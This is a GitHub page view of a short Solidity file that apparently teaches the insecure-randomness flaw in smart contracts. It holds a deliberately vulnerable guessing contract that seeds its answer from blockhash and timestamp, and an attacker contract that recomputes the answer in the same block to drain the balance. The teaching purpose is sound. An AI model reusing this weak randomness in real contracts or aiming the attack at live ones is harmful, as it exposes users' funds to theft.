generated from andreitoma8/HardHat-TypeScript-Template
-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathInsecureRandomness.sol
34 lines (28 loc) · 1.16 KB
/
InsecureRandomness.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract InsecureRandomnessVulnerable {
constructor() payable {}
// Guess the correct number to win the entire contract's balance.
function guess(uint256 _guess) public {
uint256 answer = uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp)));
if (_guess == answer) {
(bool success,) = msg.sender.call{value: address(this).balance}("");
require(success, "Transfer failed.");
}
}
}
contract InsecureRandomnessAttacker {
InsecureRandomnessVulnerable vulnerable;
constructor(InsecureRandomnessVulnerable _vulnerable) {
vulnerable = _vulnerable;
}
// Guess the correct number to win the entire contract's balance.
function attack() public payable {
// Just copy the guess function logic from the vulnerable contract
// since they are both executed in the same block.
uint256 answer = uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp)));
vulnerable.guess(answer);
}
// Receive function triggers the attack.
receive() external payable {}
}